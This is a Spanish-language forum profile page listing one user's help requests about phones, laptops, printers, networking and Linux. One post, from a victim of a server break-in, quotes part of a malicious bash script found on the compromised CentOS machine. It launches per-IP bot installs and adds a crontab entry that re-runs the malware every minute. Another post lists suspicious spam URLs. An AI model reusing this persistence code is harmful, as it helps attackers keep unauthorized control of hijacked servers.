elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Temas
Páginas: [1] 2
1  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Capacidad del celular casi al 100% en: 9 Septiembre 2021, 02:29 am
Saludos !!

Tengo un celular Huawei P9, el cual tiene memoria interna de 32 gb, pero resulta que esta casi al tope, cuando miro la capacidad hay una sección que pone otros con 14,15 gb de uso,  no se que es eso, he buscado en la memoria borrado archivos con el gestor de memoria y manualmente y eso no baja, ni siquiera la música y videos que se descargan de Ws y Telegram tienen tanto tamaño.

Agradezco su ayuda si saben como disminuir esta capacidad y a que hace referencia ese Otros

Esta es la imagen del gestor de memoria :

2  Informática / Hardware / Problema con batería de laptop Lenovo Y400 en: 4 Octubre 2020, 21:39 pm
Saludos compañeros,

La batería de mi portátil Lenovo Y400 no dura nada, se descarga muy rápido. Tengo la configuración en modo de energía ahorro, a veces la dejo en mejor batería pero igual se descarga rapido.

Hice esto para ver el informe del laptop:
cd %userprofile% /Desktop
powercfg -energy


esta es la parte de la bateria, segun lei la carga completa debe ser igual a la capacidad de diseño aqui da menos.



Alguno que sepa si requiere cambio mi bateria ?


3  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Tarjeta Micro SD dañada en Huawei P9 en: 1 Mayo 2020, 02:48 am
Saludos compañeros,

Tengo hace varios años un celular Huawei P9 al cual le instale una tarjeta micro SD San Disk clase 10 de 128 gb. Pero hoy sem e daño, sale un mensaje en el celular tarjeta dañada, traté de ejecutarle un chkdsk g:/f pero me sale error: Error al examinar el mapa de bits del volumen.

Alguna ayuda.. gracias

4  Comunicaciones / Redes / Conexion a internet en: 27 Julio 2014, 01:50 am
Hola a todos tengo este escenario:

tengo un portatil,  estoy conectado a una red inalambrica y tambien conecto un cable de red y de las dos formas hay conexion a internet, entonces por donde estaria navegando por el Wifi o por el cable ???  de donde obtengo o quien suministra la dir IP el Wifi o la red LAN ??


Gracias

5  Sistemas Operativos / Windows / Problema al agregar impresora win7 home basic en: 24 Agosto 2012, 18:06 pm
Problema al agregar impresora win7
saludos para todos

les comento el siguiente problema.

hace poco en la empresa se adquirio un portatil nuevo marca toshiba Satellite con sistema operativo win 7 home basic.

el problema es q por ninguna forma puedo agregar impresoras, la impresora que quiero agregar es una HP laserjet 1020 y esta conectada a un pc con win 7 professional, esta impresora funciona normalmente con los otros pcs. tampoco puedo ver algun equipo en red, todos los pcs estan en el mismo grupo de trabajo.

cuando intento agregar una impresora por el asistente de agregar impresoras me sale este mensaje:

no se puede tener acceso a es posible que no tenga permisos para usar este recurso de red windows 7

agradezco cualquier ayuda es urgente gracias

 ;-) ;-)
6  Comunicaciones / Redes / ayuda para organizar switch y patch panel en: 31 Julio 2012, 05:05 am
saludos para todos.-

tengo la ardua tarea de organizar un switch 3com de 24 ptos en la empresa donde trabajo el cual presta sus funciones par la red local.

Este switch en mencion y el patch panel tienen un desorden impresionante y apocaliptico: no se sabe el orden y nombre de los cables, ya dos equipos dejaron de funcionar en la red, esta muy desornado y sucio en fin son varias cosas... entonces les pregunto a los expertos: cuales son los correctos pasos para ordenar estos dispositivos?? como debo hacer para ordenar este switch y patch panel e identificar cada Pc de la red??

mil gracias estare muy agradecido por la ayuda
7  Sistemas Operativos / GNU/Linux / Problema con samba en: 31 Mayo 2012, 07:33 am
hola a todos

tengo un grande problema en la empresa, les comento:

por cuestiones legales estamos cambiando los sistemas operativos a linux (centos 5.5 y 5.3) pero hay algunos equipos con windows que deben permanecer asi.. el problema radica en una carpeta la cual es compartida desde un pc con win 7 home premium a varios pcs, que al principio no podia compartirla con ningun pc , pero logre compartirla a equipos linux por medio de samba y otro trucos

la cuestion es q desde mi equipo linux (centos 5.5 con entorno KDE) se visualiza la carpeta compartida con todos los archivos y ok ...pero por alguna razon los archivos q trabaja otro usuario en windows no quedan actualizados al verlos en el linux, es decir los cambios guardados desde windows no los veo en linux

ya hice lo mas dificil q fue compartir la carpeta pero ahora resulto con este problema, si alguien sabe como orientarme le estare muy agradecido

gracias   ;-) ;-)
8  Seguridad Informática / Seguridad / Hackearon la empresa -confirmado en: 1 Abril 2012, 04:05 am
saludos para todos

les cuento:

trabajo para una empresa dedicada ala compra y venta de insumos farmacologicos, en los puntos de venta tenemos instalado el sistema operativo: Centos y en otros red hat o sea todo lo trabajamos con linux y ademas tenemos un software empresarial q tambien solo funciona con linux...hace poco instalamos un nuevo punto con Centos y con un nuevo motor de base de datos: Postgres ya que normalmente utilizamos Informix... tuvimos el descuido en dejar una clave de root muy facil y despues de unos dias nos dimos cuenta que ni siquiera podiamos entrar por ssh (desde otro pc) y tampoco en el punto de venta, luego de varios procedimientos logramos ingresar por root y pues encontramos una carpeta sospechosa, se llama asi  /opt  y estaba en /root

dentro de esta carpeta hay dos subcarpetas llamadas aubit4gl (averigue es un emulador de base de datos)   y  la otra: bomfunk (no se que es)
dentro de aubit4gl hay mas subcarpetas con archivos planos los cuales tienen codigo sql y otras cosas mas por ej: hay una subcarpeta /bin con archivos: adbaccess, adecompile, amake, sql_parse, otra subcarpeta /etc con archivos boostrap, configsub  y hay muchos mas archivos la otra bomfunk tiene mas archivos  con codigos y textos en ingles como si fueran conversaciones

entons pregunto
-todo esto hace parte de algun programa?
-cual es la finalidad de estos programas?
-que tan grave es?
-que debo hacer para evitarlos?

agradezco la ayuda y colaboracion---

un archivo de esos dice asi (si alguien sabe y me informa que significa)
#!/bin/bash
if [ $# != 1 ]; then
   echo "######Un cadou de la Riko pentru Bomfunk######"
       echo "#+#+#+ bine lucrat hackere !!"
        echo "Tasteaza : ./start canal "
   echo "P.S : fara diez!"
        exit;
fi
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "######Un cadou de la Riko pentru Bomfunk######"
echo "@@@@ bine lucrat hackere !!"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
echo -e "\b\.\c"
D=2
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
9  Comunicaciones / Redes / instalar camaras ip con modem tipo servidor en: 15 Diciembre 2011, 05:36 am
hola compañeros

alguien me podria  ayudar , es q tengo q instalar camaras ip en la empresa y pues yo se como hacerlo por medio de un router adicional , haciendo un mapeo de puertos con la ip fija y configurando la camara con el software q trae, tengo buena teoria q he recopilado por internet

la vuelta es q en muchos puntos de venta aprox 20 no tengo router y me tocaria con el modem q me da el ISP, y este tiene una configuracion tipo servidor es decir tiene una ip publica una mask y gateway q hacen parte de un pool de direcciones, estos modems no tienen el PAT habilitado y pues ahi ni idea como hacerlo ,..

cualquier ayuda estare muy agradecido
 ;D ;D
10  Seguridad Informática / Seguridad / Son virus?? en: 15 Julio 2011, 05:54 am
hola muchachos  ahce poco recibi un correo en mi cuenta de hotmail , de uno de mis contactos el cual asegura no haber enviado nada,  el mensaje esta sin asunto y solo estan estos links:

hello! http://_  www.leonardobieber.it/indexwx4.php?gshowtopic=47iy

.. http://_ kaireiss.de/indexwx4.php?xugmailID=1ysx


no me atrevo a darles click no se lo q es , cuando veo algo asi simplemente borro el mensaje, pero le pregunto a los expertos q significa ese link ?? quien los coloca ?? como se propagan?


gracias

 ::) ::)
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines